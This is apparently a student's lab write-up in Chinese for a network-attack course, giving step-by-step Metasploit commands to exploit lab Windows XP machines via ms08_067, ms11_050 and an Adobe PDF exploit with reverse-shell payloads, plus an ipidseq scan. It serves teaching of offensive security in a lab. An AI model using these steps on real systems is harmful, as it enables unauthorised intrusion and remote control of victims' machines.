• 20145219《网络对抗》MSF基础应用

    20145219《网络对抗》MSF基础应用

    基础问题回答

    • 用自己的话解释什么是exploit,payload,encode

    exploit:把实现设置好的东西送到要攻击的主机里。

    payload:用来攻击的代码、程序等。

    encode:编码方式,让被传输的东西变得更不易被发现。

    实践过程记录

    • 靶机1:WinXPenSP3,IP地址:192.168.87.127
    • 靶机2:Windows XP Professional,IP地址:192.168.87.130
    • Kali IP地址:192.168.87.128

    1、主动攻击:ms08_067

    使用靶机1和Kali

    search ms08_067查询一下针对该漏洞的攻击模块:

    use exploit/windows/smb/ms08_067_netapi使用该模块:

    show targets查看可以被攻击的靶机的操作系统型号:

    show payloads查看可以供我们使用的攻击载荷:

    从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:

    show options查看需要设置的参数:

    这里需要设置RHOST(靶机IP)和LHOST(Kali的IP),使用set 需设置的参数名 参数值命令即可设置:

    show options确认需要设置的参数是否已经设置好:

    确认参数设置无误后,用exploit指令开始攻击:

    攻击成功后会获取靶机的shell,可以对其进行操作:

    2、针对浏览器的攻击:ms11_050

    使用靶机2和Kali

    search ms11_050查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement使用该模块:

    info查看该模块的信息(这个指令相当于show targetsshow options等的集合版):

    基本信息:

    targets信息:

    options信息:

    set payload windows/meterpreter/reverse_tcp设置payload,并设置需要设置的参数。

    show options确认需要设置的参数是否已经设置好:

    确认参数设置无误后,用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:

    在靶机IE上输入该网址:

    kali中显示session 1已经创建,并显示其会话ID:

    输入sessions -i 1,成功获取靶机的shell,可以对其进行操作:

    3、针对客户端的攻击:adobe_toolbutton

    使用靶机1和Kali

    search adobe查询一下针对该漏洞的攻击模块:

    选择一个模块并使用该模块:

    show targets查看可以被攻击的靶机的操作系统型号:

    选择可用的攻击载荷并设置好:

    show options查看需要设置的参数:

    设置参数,并用show options确认需要设置的参数是否已经设置好:

    确认参数设置无误后,用exploit指令开始攻击,可以看到生成了一个设置好的pdf文件:

    在文件夹中打开显示隐藏文件夹选项,找到生成的文件,并将其粘贴到靶机上:

    设置监听模块(同前几次实验):

    在靶机上打开刚刚那个pdf文件,可以观察到Kali成功获取了靶机的shell,可以对其进行操作:

    4、成功应用任何一个辅助模块:ipidseq

    • ipidseq

        功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。
  
  拥有递增的IPID的空闲(空闲是指该主机在特定时间内不向网络发送数据包)主机(即显示为`Incremental!`的条目),不会被网络上的其它主机严重影响,可以用来进行TCP空闲扫描。
  
  TCP空闲扫描:是一种高级的nmap扫描方式,这种扫描方式能让我们冒充网络上另一台主机的IP地址对目标进行更为隐秘的扫描。

    show auxiliary查看所有辅助模块,并选择其中的一个,我选的是scanner/ip/ipidseq

    查看需要设置的参数,设置完成后确认一下,然后就可以开始exploit了。

    这里可以进行对单一目标主机的扫描:

    也可以对指定网段的主机进行扫描:

    实验总结与体会

    这一次的实验我是先看老师和组长的过程学习使用etasploit的基本应用方式,然后按照这个模式去自己实践,先寻找可攻击的漏洞、再根据漏洞名和所属目录猜测漏洞攻击的方面、再查看漏洞的详细信息、在设置一系列参数、最后实施攻击并查看攻击结果。在这个实践过程中,因为有同学的提醒,让我少走了一些弯路,选择的靶机都很适合,攻击基本没有出现什么太大的问题。我的时间主要花费在第四步上,由于英文水平真的不太好,我做辅助模块的时候不太清楚攻击会产生什么具体现象(用百度搜索想找一些关于某个漏洞的具体介绍吧,还是英文的……求助线上翻译软件吧,那翻出来的东西真的是完全不能看,读起来都不是一句中国话),基本全靠猜……尝试了很多个漏洞,明确报错的只有一个,其他的都似乎是成功了,但是我看不懂也不太敢确认,最后,皇天不负苦心人!我终于找到一个用我的词汇量能看懂的漏洞——ipidseq!简直不能更高兴!经过这个实验吧,我觉得我还是去背单词吧……
  • 相关阅读:
    springboot2系列目录
    zookeeper 集群部署
    canal 配置 详细说明
    在Docker环境下部署Kafka
    Spring4新特性
    centos7 卸载 jdk
    Kafka安装
    Scala 面向对象(三):package 包 (二)
    Scala 基础(七):Scala 运算符
    Maven 专题(四):什么是Maven
  • 原文地址:https://www.cnblogs.com/20145219songge/p/6711409.html
Copyright © 2020-2023  润新知